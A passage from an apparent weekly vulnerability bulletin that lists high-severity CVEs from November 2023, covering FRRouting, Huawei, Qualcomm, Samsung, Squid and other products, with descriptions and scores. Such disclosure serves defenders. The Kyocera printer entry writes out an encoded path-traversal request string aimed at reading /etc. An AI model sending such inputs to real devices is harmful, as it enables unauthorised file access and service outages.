frrouting — frrouting bgpd/bgp_flowspec.c in FRRouting (FRR) before 8.4.3 mishandles an nlri length of zero, aka a “flowspec overflow.” 2023-11-06 9.8 CVE-2023-38406
MISC
MISC
frrouting — frrouting bgpd/bgp_label.c in FRRouting (FRR) before 8.5 attempts to read beyond the end of the stream during labeled unicast parsing. 2023-11-06 7.5 CVE-2023-38407
MISC
MISC
MISC
frrouting — frrouting An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when processing a crafted BGP UPDATE message with a MP_UNREACH_NLRI attribute and additional NLRI data (that lacks mandatory path attributes). 2023-11-03 7.5 CVE-2023-47234
MISC
frrouting — frrouting An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when a malformed BGP UPDATE message with an EOR is processed, because the presence of EOR does not lead to a treat-as-withdraw outcome. 2023-11-03 7.5 CVE-2023-47235
MISC
ge — micom_s1_agile General Electric MiCOM S1 Agile is vulnerable to an attacker achieving code execution by placing malicious DLL files in the directory of the application. 2023-11-07 7.3 CVE-2023-0898
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 11.6 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. It was possible for an unauthorised project or group member to read the CI/CD variables using the custom project templates. 2023-11-06 7.7 CVE-2023-3399
MISC
MISC
google — android In video, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08235273; Issue ID: ALPS08250357. 2023-11-06 7.8 CVE-2023-32837
MISC
google — android In video, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08235273; Issue ID: ALPS08235273. 2023-11-06 7 CVE-2023-32832
MISC
google — chrome Use after free in WebAudio in Google Chrome prior to 119.0.6045.123 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-11-08 8.8 CVE-2023-5996

 

gpac — gpac Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3.0-DEV. 2023-11-07 7.5 CVE-2023-5998
 
group-office — group_office Group-Office is an enterprise CRM and groupware tool. In affected versions there is full Server-Side Request Forgery (SSRF) vulnerability in the /api/upload.php endpoint. The /api/upload.php endpoint does not filter URLs which allows a malicious user to cause the server to make resource requests to untrusted domains. Note that protocols like file:// can also be used to access the server disk. The request result (on success) can then be retrieved using /api/download.php. This issue has been addressed in versions 6.8.15, 6.7.54, and 6.6.177. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-07 8.8 CVE-2023-46730
 
gss — vitals_enterprise_social_platform Galaxy Software Services Corporation Vitals ESP is an online knowledge base management portal, it has insufficient filtering and validation during file upload. An authenticated remote attacker with general user privilege can exploit this vulnerability to upload and execute scripts onto arbitrary directories to perform arbitrary system operations or disrupt service. 2023-11-03 8.8 CVE-2023-41357
MISC
huawei — emui Vulnerability of missing encryption in the card management module. Successful exploitation of this vulnerability may affect service confidentiality. 2023-11-08 7.5 CVE-2023-44098
 
huawei — emui Vulnerability of uncaught exceptions in the NFC module. Successful exploitation of this vulnerability can affect NFC availability. 2023-11-08 7.5 CVE-2023-46765
 
huawei — emui Security vulnerability in the face unlock module. Successful exploitation of this vulnerability may affect service confidentiality. 2023-11-08 7.5 CVE-2023-46771
 
huawei — emui Vulnerability of uncaught exceptions in the NFC module. Successful exploitation of this vulnerability can affect NFC availability. 2023-11-08 7.5 CVE-2023-46774
 
huawei — harmonyos Vulnerability of identity verification being bypassed in the face unlock module. Successful exploitation of this vulnerability will affect integrity and confidentiality. 2023-11-08 9.1 CVE-2023-5801
 
huawei — harmonyos Vulnerability of improper permission control in the Booster module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. 2023-11-08 7.5 CVE-2023-44115
 
huawei — harmonyos The remote PIN module has a vulnerability that causes incorrect information storage locations.Successful exploitation of this vulnerability may affect confidentiality. 2023-11-08 7.5 CVE-2023-46757
 
huawei — harmonyos Permission management vulnerability in the multi-screen interaction module. Successful exploitation of this vulnerability may cause service exceptions of the device. 2023-11-08 7.5 CVE-2023-46758
 
huawei — harmonyos Permission control vulnerability in the call module. Successful exploitation of this vulnerability may affect service confidentiality. 2023-11-08 7.5 CVE-2023-46759
 
huawei — harmonyos Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions. 2023-11-08 7.5 CVE-2023-46760
 
huawei — harmonyos Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions. 2023-11-08 7.5 CVE-2023-46761
 
huawei — harmonyos Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions. 2023-11-08 7.5 CVE-2023-46762
 
huawei — harmonyos Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions. 2023-11-08 7.5 CVE-2023-46766
 
huawei — harmonyos Out-of-bounds write vulnerability in the kernel driver module. Successful exploitation of this vulnerability may cause process exceptions. 2023-11-08 7.5 CVE-2023-46767
 
huawei — harmonyos Multi-thread vulnerability in the idmap module. Successful exploitation of this vulnerability may cause features to perform abnormally. 2023-11-08 7.5 CVE-2023-46768
 
huawei — harmonyos Use-After-Free (UAF) vulnerability in the dubai module. Successful exploitation of this vulnerability will affect availability. 2023-11-08 7.5 CVE-2023-46769
 
huawei — harmonyos Out-of-bounds vulnerability in the sensor module. Successful exploitation of this vulnerability may cause mistouch prevention errors on users’ mobile phones. 2023-11-08 7.5 CVE-2023-46770
 
ibm — cics_tx IBM CICS TX Standard 11.1 and Advanced 10.1, 11.1 performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. IBM X-Force ID: 266163. 2023-11-03 7.5 CVE-2023-43018
MISC
MISC
ibm — mq_appliance IBM MQ Appliance 9.3 CD could allow a local attacker to gain elevated privileges on the system, caused by improper validation of security keys. IBM X-Force ID: 269535. 2023-11-03 7.8 CVE-2023-46176
MISC
MISC
ibm — txseries_for_multiplatforms IBM CICS TX Standard 11.1, Advanced 10.1, 11.1, and TXSeries for Multiplatforms 8.1, 8.2, 9.1 are vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 266057. 2023-11-03 8.8 CVE-2023-42027
MISC
MISC
MISC
intelliants — subrion Subrion 4.2.1 has a remote command execution vulnerability in the backend. 2023-11-03 8.8 CVE-2023-46947
MISC
ivanti — automation A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication. 2023-11-03 7.8 CVE-2022-44569
MISC
ivanti — avalanche Ivanti Avalanche Smart Device Service Missing Authentication Local Privilege Escalation Vulnerability 2023-11-03 7.8 CVE-2022-43554
MISC
ivanti — avalanche Ivanti Avalanche Printer Device Service Missing Authentication Local Privilege Escalation Vulnerability 2023-11-03 7.8 CVE-2022-43555
MISC
ivanti — avalanche Ivanti Avalanche EnterpriseServer Service Unrestricted File Upload Local Privilege Escalation Vulnerability 2023-11-03 7.8 CVE-2023-41725
MISC
ivanti — avalanche Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability 2023-11-03 7.8 CVE-2023-41726
MISC
kerawen — kerawen kerawen before v2.5.1 was discovered to contain a SQL injection vulnerability via the ocs_id_cart parameter at KerawenDeliveryModuleFrontController::initContent(). 2023-11-04 9.8 CVE-2023-40922
MISC
kubernetes — apiserver A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client’s API server credentials to third parties. 2023-11-03 8.2 CVE-2022-3172
MISC
MISC
kubernetes — csi_proxy A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes running kubernetes-csi-proxy may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes running kubernetes-csi-proxy. 2023-11-03 8.8 CVE-2023-3893
MISC
MISC
kyocera — d-copia253mf_plus_firmware Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow a denial of service (service outage) via /wlmdeu%2f%2e%2e%2f%2e%2e followed by a directory reference such as %2fetc%00index.htm to try to read the /etc directory. 2023-11-03 7.5 CVE-2023-34260
MISC
MISC
linagora — twake Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 2023.Q1.1223. 2023-11-07 9.8 CVE-2023-2675
 
linux — kernel An out-of-bounds (OOB) memory read flaw was found in parse_lease_state in the KSMBD implementation of the in-kernel samba server and CIFS in the Linux kernel. When an attacker sends the CREATE command with a malformed payload to KSMBD, due to a missing check of `NameOffset` in the `parse_lease_state()` function, the `create_context` object can access invalid memory. 2023-11-03 8.1 CVE-2023-1194
MISC
MISC
MISC
linux — kernel A use-after-free flaw was found in the Linux kernel’s mm/mremap memory address space accounting source code. This issue occurs due to a race condition between rmap walk and mremap, allowing a local user to crash the system or potentially escalate their privileges on the system. 2023-11-03 7 CVE-2023-1476
MISC
MISC
MISC
MISC
lost_and_found_information_system — lost_and_found_information_system Lost and Found Information System 1.0 allows account takeover via username and password to a /classes/Users.php?f=save URI. 2023-11-03 9.8 CVE-2023-38965
MISC
MISC
macvim — macvim Macvim is a text editor for MacOS. Prior to version 178, Macvim makes use of an insecure interprocess communication (IPC) mechanism which could lead to a privilege escalation. Distributed objects are a concept introduced by Apple which allow one program to vend an interface to another program. What is not made clear in the documentation is that this service can vend this interface to any other program on the machine. The impact of exploitation is a privilege escalation to root – this is likely to affect anyone who is not careful about the software they download and use MacVim to edit files that would require root privileges. Version 178 contains a fix for this issue. 2023-11-07 7.8 CVE-2023-41036

 

mediatek — nr15 In 5G NRLC, there is a possible invalid memory access due to lack of error handling. This could lead to remote denial of service, if UE received invalid 1-byte rlc sdu, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00921261; Issue ID: MOLY01128895. 2023-11-06 7.5 CVE-2023-20702
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2023-11-10 7.3 CVE-2023-36014
microsoft — edge_chromium Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2023-11-03 7.3 CVE-2023-36034
MISC
microsoft — edge_chromium Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2023-11-10 7.1 CVE-2023-36024
midori-global — better_pdf_exporter Local File Inclusion vulnerability in Midori-global Better PDF Exporter for Jira Server and Jira Data Center v.10.3.0 and before allows an attacker to view arbitrary files and cause other impacts via use of crafted image during PDF export. 2023-11-07 7.8 CVE-2023-42361

 

mitsubishi_electric — fx3u-32mt/es_firmware Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause denial-of-service (DoS) condition on the products by sending specific packets. 2023-11-06 9.1 CVE-2023-4699
MISC
MISC
MISC
mongodb — atlas_kubernetes_operator The affected versions of MongoDB Atlas Kubernetes Operator may print sensitive information like GCP service account keys and API integration secrets while DEBUG mode logging is enabled. This issue affects MongoDB Atlas Kubernetes Operator versions: 1.5.0, 1.6.0, 1.6.1, 1.7.0. Please note that this is reported on an EOL version of the product, and users are advised to upgrade to the latest supported version. Required Configuration:  DEBUG logging is not enabled by default, and must be configured by the end-user. To check the log-level of the Operator, review the flags passed in your deployment configuration (eg. https://github.com/mongodb/mongodb-atlas-kubernetes/blob/main/config/manager/manager.yaml#L27 https://github.com/mongodb/mongodb-atlas-kubernetes/blob/main/config/manager/manager.yaml#L27 ) 2023-11-07 7.5 CVE-2023-0436
nationaledtech — boomerang An issue was discovered in the Boomerang Parental Control application through 13.83 for Android. The child can use Safe Mode to remove all restrictions temporarily or uninstall the application without the parents noticing. 2023-11-03 9.1 CVE-2023-36621
MISC
MISC
MISC
ncsist — mobile_device_manager NCSIST ManageEngine Mobile Device Manager(MDM) APP’s special function has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and read arbitrary system files. 2023-11-03 7.5 CVE-2023-41344
MISC
netskope — netskope Netskope was made aware of a security vulnerability in its NSClient product for version 100 & prior where a malicious non-admin user can disable the Netskope client by using a specially crafted package. The root cause of the problem was a user control code when called by a Windows ServiceController did not validate the permissions associated with the user before executing the user control code. This user control code had permissions to terminate the NSClient service.  2023-11-06 8.8 CVE-2023-4996
MISC
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient measures to prevent multiple failed authentication attempts. An unauthenticated remote attacker can execute a crafted Javascript to expose captcha in page, making it very easy for bots to bypass the captcha check and more susceptible to brute force attacks. 2023-11-03 9.8 CVE-2023-41350
MISC
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of authentication bypass, which allows an unauthenticated remote attacker to bypass the authentication mechanism to log in to the device by an alternative URL. This makes it possible for unauthenticated remote attackers to log in as any existing users, such as an administrator, to perform arbitrary system operations or disrupt service. 2023-11-03 9.8 CVE-2023-41351
MISC
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q Firewall function has a vulnerability of input validation for ICMP redirect messages. An unauthenticated remote attacker can exploit this vulnerability by sending a crafted package to modify the network routing table, resulting in a denial of service or sensitive information leaking. 2023-11-03 9.8 CVE-2023-41355
MISC
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of weak password requirements. A remote attacker with regular user privilege can easily infer the administrator password from system information after logging system, resulting in admin access and performing arbitrary system operations or disrupt service. 2023-11-03 8.8 CVE-2023-41353
MISC
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q has a vulnerability of insufficient filtering for user input. A remote attacker with administrator privilege can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services. 2023-11-03 7.2 CVE-2023-41352
MISC
opayweb — opay An Information Disclosure vulnerability exists in Opay Mobile application 1.5.1.26 and maybe be higher in the logcat app. 2023-11-07 7.5 CVE-2021-43419
 
opendesign — drawings_sdk An issue was discovered in Open Design Alliance Drawings SDK before 2024.10. A corrupted value for the start of MiniFat sector in a crafted DGN file leads to an out-of-bounds read. This can allow attackers to cause a crash, potentially enabling a denial-of-service attack (Crash, Exit, or Restart) or possible code execution. 2023-11-07 7.8 CVE-2023-5179
openssl — openssl Issue summary: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_generate_key() to generate an X9.42 DH key may experience long delays. Likewise, applications that use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check() to check an X9.42 DH key or X9.42 DH parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source this may lead to a Denial of Service. While DH_check() performs all the necessary checks (as of CVE-2023-3817), DH_check_pub_key() doesn’t make any of these checks, and is therefore vulnerable for excessively large P and Q parameters. Likewise, while DH_generate_key() performs a check for an excessively large P, it doesn’t check for an excessively large Q. An application that calls DH_generate_key() or DH_check_pub_key() and supplies a key or parameters obtained from an untrusted source could be vulnerable to a Denial of Service attack. DH_generate_key() and DH_check_pub_key() are also called by a number of other OpenSSL functions. An application calling any of those other functions may similarly be affected. The other functions affected by this are DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate(). Also vulnerable are the OpenSSL pkey command line application when using the “-pubcheck” option, as well as the OpenSSL genpkey command line application. The OpenSSL SSL/TLS implementation is not affected by this issue. The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue. 2023-11-06 7.5 CVE-2023-5678
MISC
MISC
MISC
MISC
MISC
ortussolutions — coldbox_elixir A vulnerability classified as problematic has been found in Ortus Solutions ColdBox Elixir 3.1.6. This affects an unknown part of the file src/defaultConfig.js of the component ENV Variable Handler. The manipulation leads to information disclosure. Upgrading to version 3.1.7 is able to address this issue. The identifier of the patch is a3aa62daea2e44c76d08d1eac63768cd928cd69e. It is recommended to upgrade the affected component. The identifier VDB-244485 was assigned to this vulnerability. 2023-11-06 7.5 CVE-2021-4430
MISC
MISC
MISC
MISC
perforce — helix_core An arbitrary code execution which results in privilege escalation was discovered in Helix Core versions prior to 2023.2. Reported by Jason Geffner. 2023-11-08 9.8 CVE-2023-45849
perforce — helix_core In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the shutdown function was identified. Reported by Jason Geffner.   2023-11-08 7.5 CVE-2023-35767
perforce — helix_core In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the commit function was identified. Reported by Jason Geffner.  2023-11-08 7.5 CVE-2023-45319
perforce — helix_core In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified. Reported by Jason Geffner.   2023-11-08 7.5 CVE-2023-5759
phpfox — phpfox An issue was discovered in phpFox before 4.8.14. The url request parameter passed to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. 2023-11-03 9.8 CVE-2023-46817
MISC
MISC
MISC
MISC
MISC
prestashop– prestashop In the module “Order Duplicator ” Clone and Delete Existing Order” (orderduplicate) in version <= 1.1.7 from Silbersaiten for PrestaShop, a guest can download personal information without restriction. Due to a lack of permissions control, a guest can download personal information from ps_customer/ps_address tables such as name / surname / phone number / full postal address. 2023-11-07 8.8 CVE-2023-45380
progress — ws_ftp_server In WS_FTP Server versions prior to 8.7.6 and 8.8.4, an unrestricted file upload flaw has been identified. An authenticated Ad Hoc Transfer user has the ability to craft an API call which allows them to upload a file to a specified location on the underlying operating system hosting the WS_FTP Server application. 2023-11-07 8.8 CVE-2023-42659
 
projectworlds — online_job_portal Online Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txt_password’ parameter of the index.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 9.8 CVE-2023-46680
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘id’ parameter of the partner_preference.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 9.8 CVE-2023-46785
 
projectworlds — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘pass’ parameter in the ‘register()’ function of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-11-07 9.8 CVE-2023-46798
 
puppet — puppet_enterprise Versions of Puppet Enterprise prior to 2021.7.6 and 2023.5 contain a flaw which results in broken session management for SAML implementations. 2023-11-07 9.8 CVE-2023-5309
python — pillow An issue was discovered in Pillow before 10.0.0. It is a Denial of Service that uncontrollably allocates memory to process a given task, potentially causing a service to crash by having it run out of memory. This occurs for truetype in ImageFont when textlength in an ImageDraw instance operates on a long text argument. 2023-11-03 7.5 CVE-2023-44271
MISC
MISC
MISC
qemu — qemu A bug in QEMU could cause a guest I/O operation otherwise addressed to an arbitrary disk offset to be targeted to offset 0 instead (potentially overwriting the VM’s boot code). This could be used, for example, by L2 guests with a virtual disk (vdiskL2) stored on a virtual disk of an L1 (vdiskL1) hypervisor to read and/or write data to LBA 0 of vdiskL1, potentially gaining control of L1 at its next reboot. 2023-11-03 7 CVE-2023-5088
MISC
MISC
MISC
qnap — music_station A path traversal vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to read the contents of unexpected files and expose sensitive data via a network. We have already fixed the vulnerability in the following versions: Music Station 4.8.11 and later Music Station 5.1.16 and later Music Station 5.3.23 and later 2023-11-03 7.5 CVE-2023-39299
MISC
qnap — qts An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2376 build 20230421 and later QTS 4.5.4.2374 build 20230416 and later QuTS hero h5.0.1.2376 build 20230421 and later QuTS hero h4.5.4.2374 build 20230417 and later QuTScloud c5.0.1.2374 and later 2023-11-03 9.8 CVE-2023-23368
MISC
qnap — qts An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: Multimedia Console 2.1.2 ( 2023/05/04 ) and later Multimedia Console 1.4.8 ( 2023/05/05 ) and later QTS 5.1.0.2399 build 20230515 and later QTS 4.3.6.2441 build 20230621 and later QTS 4.3.4.2451 build 20230621 and later QTS 4.3.3.2420 build 20230621 and later QTS 4.2.6 build 20230621 and later Media Streaming add-on 500.1.1.2 ( 2023/06/12 ) and later Media Streaming add-on 500.0.0.11 ( 2023/06/16 ) and later 2023-11-03 9.8 CVE-2023-23369
MISC
qualcomm — snapdragon Memory Corruption in Multi-mode Call Processor while processing bit mask API. 2023-11-07 9.8 CVE-2023-22388
qualcomm — snapdragon Memory corruption in WLAN Firmware while parsing a NAN management frame carrying a S3 attribute. 2023-11-07 9.8 CVE-2023-33045
qualcomm — snapdragon Memory corruption in WLAN HOST while processing the WLAN scan descriptor list. 2023-11-07 8.8 CVE-2023-28572
qualcomm — snapdragon Memory Corruption in Core during syscall for Sectools Fuse comparison feature. 2023-11-07 7.8 CVE-2023-21671
qualcomm — snapdragon Memory Corruption in Core due to secure memory access by user while loading modem image. 2023-11-07 7.8 CVE-2023-24852
qualcomm — snapdragon Memory corruption in TZ Secure OS while loading an app ELF. 2023-11-07 7.8 CVE-2023-28545
qualcomm — snapdragon Cryptographic issue in HLOS during key management. 2023-11-07 7.8 CVE-2023-28556
qualcomm — snapdragon Memory corruption while processing audio effects. 2023-11-07 7.8 CVE-2023-28570
qualcomm — snapdragon Memory corruption in core services when Diag handler receives a command to configure event listeners. 2023-11-07 7.8 CVE-2023-28574
qualcomm — snapdragon Memory corruption in Automotive Audio while copying data from ADSP shared buffer to the VOC packet data buffer. 2023-11-07 7.8 CVE-2023-33031
qualcomm — snapdragon Memory Corruption in Audio while invoking callback function in driver from ADSP. 2023-11-07 7.8 CVE-2023-33055
qualcomm — snapdragon Memory corruption in Audio while processing the VOC packet data from ADSP. 2023-11-07 7.8 CVE-2023-33059
qualcomm — snapdragon Memory corruption in Audio when SSR event is triggered after music playback is stopped. 2023-11-07 7.8 CVE-2023-33074
qualcomm — snapdragon Transient DOS in WLAN Firmware while parsing no-inherit IES. 2023-11-07 7.5 CVE-2023-33047
qualcomm — snapdragon Transient DOS in WLAN Firmware while parsing t2lm buffers. 2023-11-07 7.5 CVE-2023-33048
qualcomm — snapdragon Transient DOS in WLAN Firmware when firmware receives beacon including T2LM IE. 2023-11-07 7.5 CVE-2023-33056
qualcomm — snapdragon Transient DOS in WLAN Firmware while parsing WLAN beacon or probe-response frame. 2023-11-07 7.5 CVE-2023-33061
qualitor — qalitor Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. 2023-11-06 9.8 CVE-2023-47253
MISC
MISC
MISC
MISC
redlion — crimson The Crimson 3.2 Windows-based configuration tool allows users with administrative access to define new passwords for users and to download the resulting security configuration to a device. If such a password contains the percent (%) character, invalid values will be included, potentially truncating the string if a NUL is encountered. If the simplified password is not detected by the administrator, the device might be left in a vulnerable state as a result of more-easily compromised credentials. Note that passwords entered via the Crimson system web server do not suffer from this vulnerability. 2023-11-06 9.8 CVE-2023-5719
MISC
MISC
relativity — relativityone SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter. 2023-11-03 9.8 CVE-2023-46954
MISC
remoteclinic — remote_clinic RemoteClinic 2.0 has a SQL injection vulnerability in the ID parameter of /medicines/stocks.php. 2023-11-07 9.8 CVE-2023-33478
remoteclinic — remote_clinic RemoteClinic version 2.0 contains a SQL injection vulnerability in the /staff/edit.php file. 2023-11-07 9.8 CVE-2023-33479
remoteclinic — remote_clinic RemoteClinic 2.0 is vulnerable to a time-based blind SQL injection attack in the ‘start’ GET parameter of patients/index.php. 2023-11-07 9.8 CVE-2023-33481
remoteclinic — remote_clinic RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell. The vulnerabilities are caused by a lack of input validation and access control in the staff/register.php endpoint and the edit-my-profile.php page. By sending a series of specially crafted requests to the RemoteClinic application, an attacker can create admin users with more privileges than their own, upload a PHP file containing arbitrary code, and execute arbitrary commands via the PHP shell. 2023-11-07 8.8 CVE-2023-33480
samba — samba A path traversal vulnerability was identified in Samba when processing client pipe names connecting to Unix domain sockets within a private directory. Samba typically uses this mechanism to connect SMB clients to remote procedure call (RPC) services like SAMR LSA or SPOOLSS, which Samba initiates on demand. However, due to inadequate sanitization of incoming client pipe names, allowing a client to send a pipe name containing Unix directory traversal characters (../). This could result in SMB clients connecting as root to Unix domain sockets outside the private directory. If an attacker or client managed to send a pipe name resolving to an external service using an existing Unix domain socket, it could potentially lead to unauthorized access to the service and consequential adverse events, including compromise or service crashes. 2023-11-03 9.8 CVE-2023-3961
MISC
MISC
MISC
MISC
MISC
MISC
samsung — android Improper access control vulnerability in SmsController prior to SMR Nov-2023 Release1 allows attacker to bypass restrictions on starting activities from the background. 2023-11-07 9.8 CVE-2023-42531
samsung — android An improper input validation in saped_dec in libsaped prior to SMR Nov-2023 Release 1 allows attacker to cause out-of-bounds read and write. 2023-11-07 9.8 CVE-2023-42536
samsung — android An improper input validation in get_head_crc in libsaped prior to SMR Nov-2023 Release 1 allows attacker to cause out-of-bounds read and write. 2023-11-07 9.8 CVE-2023-42537
samsung — android An improper input validation in saped_rec_silence in libsaped prior to SMR Nov-2023 Release 1 allows attacker to cause out-of-bounds read and write. 2023-11-07 9.8 CVE-2023-42538
samsung — android Arbitrary File Descriptor Write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code. 2023-11-07 7.8 CVE-2023-30739
samsung — android Improper Input Validation vulnerability in ProcessNvBuffering of libsec-ril prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code. 2023-11-07 7.8 CVE-2023-42528
samsung — android Out-of-bound write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to execute arbitrary code. 2023-11-07 7.8 CVE-2023-42529
samsung — android Out-of-bounds Write in read_block of vold prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code. 2023-11-07 7.8 CVE-2023-42535
samsung — android Improper access control vulnerability in SecSettings prior to SMR Nov-2023 Release 1 allows attackers to enable Wi-Fi and Wi-Fi Direct without User Interaction. 2023-11-07 7.5 CVE-2023-42530
samsung — android Improper Certificate Validation in FotaAgent prior to SMR Nov-2023 Release1 allows remote attacker to intercept the network traffic including Firmware information. 2023-11-07 7.5 CVE-2023-42532
samsung — bixby_voice Improper verification of intent by broadcast receiver vulnerability in Bixby Voice prior to version 3.3.35.12 allows attackers to access arbitrary data with Bixby Voice privilege. 2023-11-07 7.5 CVE-2023-42543
samsung — exynos_9810_firmware An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123). Improper handling of a length parameter inconsistency can cause abnormal termination of a mobile phone. This occurs in the RLC task and RLC module. 2023-11-08 7.5 CVE-2023-41111
samsung — exynos_9810_firmware An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123). A buffer copy, without checking the size of the input, can cause abnormal termination of a mobile phone. This occurs in the RLC task and RLC module. 2023-11-08 7.5 CVE-2023-41112
samsung — phone Use of implicit intent for sensitive communication vulnerability in Phone prior to versions 12.7.20.12 in Android 11, 13.1.48, 13.5.28 in Android 12, and 14.7.38 in Android 13 allows attackers to access location data. 2023-11-07 7.5 CVE-2023-42545
schedmd — slurm SchedMD Slurm 23.02.x before 23.02.6 and 22.05.x before 22.05.10 allows filesystem race conditions for gaining ownership of a file, overwriting a file, or deleting files. 2023-11-03 7 CVE-2023-41914
MISC
CONFIRM
softing — smartlink_sw-ht Weak ciphers in Softing smartLink SW-HT before 1.30 are enabled during secure communication (SSL). 2023-11-06 7.5 CVE-2022-48193
MISC
MISC
squid-cache — squid Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a NULL pointer dereference bug Squid is vulnerable to a Denial of Service attack against Squid’s Gopher gateway. The gopher protocol is always available and enabled in Squid prior to Squid 6.0.1. Responses triggering this bug are possible to be received from any gopher server, even those without malicious intent. Gopher support has been removed in Squid version 6.0.1. Users are advised to upgrade. Users unable to upgrade should reject all gopher URL requests. 2023-11-06 7.5 CVE-2023-46728
MISC
MISC
squid-cache — squid Squid is vulnerable to a Denial of Service, where a remote attacker can perform buffer overflow attack by writing up to 2 MB of arbitrary data to heap memory when Squid is configured to accept HTTP Digest Authentication. 2023-11-03 7.5 CVE-2023-46847
MISC
MISC
MISC
MISC
MISC
MISC

 

squid-cache — squid Squid is vulnerable to Denial of Service, where a remote attacker can perform DoS by sending ftp:// URLs in HTTP Request messages or constructing ftp:// URLs from FTP Native input. 2023-11-03 7.5 CVE-2023-46848
MISC
MISC
MISC
MISC
MISC
squid-cache — squid Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug. 2023-11-03 7.5 CVE-2023-5824
MISC
MISC
MISC
